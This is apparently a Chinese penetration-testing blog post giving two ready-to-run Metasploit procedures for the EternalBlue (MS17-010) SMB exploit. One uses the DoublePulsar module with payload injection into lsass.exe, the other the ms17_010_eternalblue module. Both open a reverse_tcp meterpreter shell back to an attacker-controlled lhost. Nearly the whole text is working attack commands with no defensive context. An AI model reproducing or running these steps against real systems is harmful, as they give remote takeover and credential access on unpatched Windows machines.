一、Eternalblue-Doublepulsar-Metasploit

##推荐使用
apt-get install wine32
git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
cd Eternalblue-Doublepulsar-Metasploit
cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb

msfconsole
search eternalblue

use exploit/windows/smb/eternalblue_doublepulsar
set DOUBLEPULSARPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set ETERNALBLUEPATH /usr/share/metasploit-framework/modules/exploits/windows/smb/deps
set PROCESSINJECT lsass.exe
set TARGETARCHITECTURE x64
set rhost 192.168.1.105
set target 9
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.104
exploit

二、metasploit模块

wget https://raw.githubusercontent.com/backlion/metasploit-framework/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb
cp ms17_010_eternalblue.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_eternalblue.rb

gem install ruby_smb #ruby_smb模块安装
msfupdate
msfconsole -qx “use exploit/windows/smb/ms17_010_eternalblue”
use exploit/windows/smb/ms17_010_eternalblue
set rhost 192.168.1.8
set lhost 192.168.1.21
set payload windows/x64/meterpreter/reverse_tcp
exploit

Categories: 内网渗透

发表评论

电子邮件地址不会被公开。 必填项已用*标注